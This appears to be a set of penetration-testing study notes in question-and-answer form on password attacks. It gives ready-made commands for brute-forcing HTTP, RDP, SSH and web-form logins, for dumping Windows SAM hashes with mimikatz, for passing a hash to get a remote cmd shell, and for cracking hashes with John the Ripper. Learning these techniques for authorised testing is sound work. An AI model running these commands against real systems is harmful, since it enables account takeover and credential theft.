Password Attacks

Question 1

What is the name of the tool that creates a custom word list based on the website?
Give an example using it with the URL www.megacorpone.com

Answer 1

– cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt

Question 2

What is the name of the tool that is a fast password cracker with the ability to generate custom wordlists?
Where is the configuration file to alter password rules?

Answer 2

• John The Ripper

- /etc/john/john.conf

Question 3

How would you add a rule to JTR that adds a 2 digit number to the end of each password?

Answer 3

• sudo vim /etc/john/john.conf

- $[0-9]$[0-9]

Question 4

What is a wordlist generator provided with Kali that can create word lists based on specific password policies?

Answer 4

Crunch

Question 5

What are the character placeholder translations for ‘crunch’?

Answer 5

• @ = lower case alpha characters
• , = upper case alpha characters
• % = numeric characters
• ^ = special characters including spaces

Question 6

Use ‘crunch to create a word list that is 8 characters in length, and follows the password structure of [capital letter][2 x lower case letters][2 x special characters][3 x numeric characters]

Answer 6

– crunch 8 8 -t ,@@^^%%%

Question 7

What are some risks with network service password attacks?

Answer 7

• noisy
• generate logs
• may lock accounts out

Question 8

What command prepares the ‘rockyou’ word list for use?

Answer 8

– sudo gunzip /usr/share/wordlists/rockyou.txt.gz

Question 9

What tool is best used for an HTTP htaccess password attack?

Answer 9

• Medusa

- THC-Hydra

Question 10

How would you use Medusa to attack the ‘admin’ account on an HTTP server at 10.11.0.22 on the ‘/admin’ page, with the ‘rockyou’ word list?

Answer 10

medusa -h 10.11.0.22 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

Question 11

What tool is recommended to for an RDP password attack?

Answer 11

• crowbar

Question 12

How do you install ‘crowbar’?

Answer 12

• sudo apt install crowbar

Question 13

What command would attempt an RDP password attack against 10.11.0.22/32 with the user ‘admin’ and password file ‘password-file.txt’?

Answer 13

crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1

Question 14

What tool is recommended for SSH password attacks?

Answer 14

THC-Hydra

Question 15

How would you use THC-Hydra for an SSH password attack against 10.11.0.22 with the ‘rockyou’ wordlist against the ‘admin’ user?

Answer 15

– hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.11.0.22

Question 16

What tool is recommended or an HTTP Post password attack?

Answer 16

• THC-Hydra

Question 17

What needs to be known for an HTTP Post password attack with Hydra?

Answer 17

• IP address
• URL of webpage containing the web form
• ‘condition string’ that indicates an unsuccessful login attempt (ex. INVALID LOGIN)

Question 18

What is the best way to get the information required for Hydra for an HTTP Post password attack?

Answer 18

• view the page source on the login page

- this should show what page handles the POST request (ex. /form/frontpage.php)

Question 19

What command should be used for an HTTP POST password attack with Hydra, given the following information:

• IP = 10.11.0.22
• POST URL = /form/frontpage.php
• user = admin
• condition string = ‘INVALID LOGIN’
• wordlist = rockyou

Answer 19

hydra 10.11.0.22 http-form-post “/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN” -l admin -P /usr/share/wordlists/rockyou.txt -vV -f

Question 20

What tool is recommended for identifying the type of hash?

Answer 20

hashid

Question 21

Given a hash ‘$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE. bI66aMYSeDXKQ8s7JNFwa1s1KkTand
6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0’ how would you check for possible hashing algorithms used to created this hash?

Answer 21

kali@kali:~$ hashid ‘$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE. bI66aMYSeDXKQ8s7JNFwa1s1KkTand
6ZsqQKAF3G0tHD9bd59e5NAz/s7DQcAojRTWNpZX0’
Analyzing ‘$6$l5bL6XIASslBwwUD$bCxeTlbhTH76wE. bI66aMYSeDXKQ8s7JNFwa1s1KkTand6ZsqQKAF3G
0tHD9bd59e5NAz/s7DQcAojRTWNpZX0’
[+] SHA-512 Crypt

Question 22

What is a recommended website for looking up hashes?

Answer 22

HashKiller

Question 23

On Windows, where are hashed user passwords stored?

Answer 23

• SAM

- Security Accounts Manager

Question 24

What protective mechanism was implemented to protect against offline SAM database password attacks?

Answer 24

• SYSKEY

- Partially encrypts the SAM file

Question 25

What is the recommended tool to extract hashes from Windows systems?

Answer 25

mimikatz

Question 26

What does mimikatz do?

Answer 26

• Among other things, mimikatz facilitates password hash extraction from the Local Security Authority Subsystem (LSASS) process memory where they are cached
• Since LSASS is a privileged process running under the SYSTEM user, we must launch mimikatz from an administrative command prompt

Question 27

In order to extract password hashes with mimikatz, what three commands need to be run?

Answer 27

1. privilege::debug = enables the SeDebugPrivilege access right required to tamper with another process
   * ** If this command fails, mimikatz was most likely not executed with admin privs ***
2. token::elevate = elevates the security token from high integrity (administrator) to SYSTEM integrity
   * ** LSASS is a SYSTEM process, which means it has even higher privileges than mimikatz running with admin privs ***
3. lsadump::sam = dumps the contents of the SAM database

Question 28

What is pash-the-hash?

Answer 28

• allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a clear text password
• this is possible because NTLM/LM password hashes are not salted and remain static between sesssions

Question 29

What tool is recommended for passing-the-hash?

Answer 29

pth-winexe

Question 30

If we have extracted a hash ‘hashhashhash’ for user ‘offsec’, what command would we use from the attacking machine against 10.11.0.22 to get a ‘cmd’ shell?

Answer 30

pth-winexe -U offsec%hashhashhash //10.11.0.22 cmd

Question 31

What tool is recommended for cracking hashes?

Answer 31

JTR

Question 32

What command would we use to try cracking NT hashes in a file named hash.txt?

Answer 32

sudo john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt –format=NT

Question 33

How would you use JTR to crack hashes on a Linux system?

Answer 33

1. use the ‘unshadow’ utility to combine the ‘passwd’ and ‘shadow’ files from the compromised system
   - -kali@kali:~$ unshadow passwd-file.txt shadow-file.txt
2. crack with JTR
   - -kali@kali:~$ john –rules –wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Question 34

What hash crack tool is recommended if GPUs are available?

Answer 34

hashcat